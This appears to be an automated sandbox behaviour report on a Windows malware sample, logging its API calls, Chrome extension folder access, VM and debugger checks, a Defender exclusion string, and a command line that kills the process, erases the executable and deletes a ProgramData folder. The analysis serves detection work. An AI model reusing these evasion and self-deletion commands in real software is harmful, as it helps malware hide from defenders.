Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_0041D360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	5_2_0041D360
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_0041F6B0 FindFirstFileExW,	5_2_0041F6B0

Source: C:\Users\user\Desktop\buIKlB688e.exe	Thread delayed: delay time: 43945			Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior

Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: buIKlB688e.exe, 00000005.00000002.389407085.0000000000EA8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: buIKlB688e.exe, 00000005.00000002.389407085.0000000000EA8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: buIKlB688e.exe, 00000005.00000002.389260406.0000000000E58000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: buIKlB688e.exe, 00000000.00000002.371640903.0000000002E74000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_004072E6

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041C810 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_0041C810

Source: C:\Users\user\Desktop\buIKlB688e.exe

Code function: 5_2_0041B160 GetCurrentHwProfileA,GetProcessHeap,HeapAlloc,lstrcat,

5_2_0041B160

Source: C:\Users\user\Desktop\buIKlB688e.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_004196D0 mov eax, dword ptr fs:[00000030h]		5_2_004196D0
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_0041B750 mov eax, dword ptr fs:[00000030h]		5_2_0041B750

Source: C:\Users\user\Desktop\buIKlB688e.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_004072E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_004072E6
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_00404354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00404354
Source: C:\Users\user\Desktop\buIKlB688e.exe	Code function: 5_2_0040E5C7 SetUnhandledExceptionFilter,	5_2_0040E5C7

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364

Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Users\user\Desktop\buIKlB688e.exe C:\Users\user\Desktop\buIKlB688e.exe	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c taskkill /pid 5364 & erase C:\Users\user\Desktop\buIKlB688e.exe & RD /S /Q C:\\ProgramData\\734573140483756\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 5364	Jump to behavior

Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Users\user\Desktop\buIKlB688e.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\buIKlB688e.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
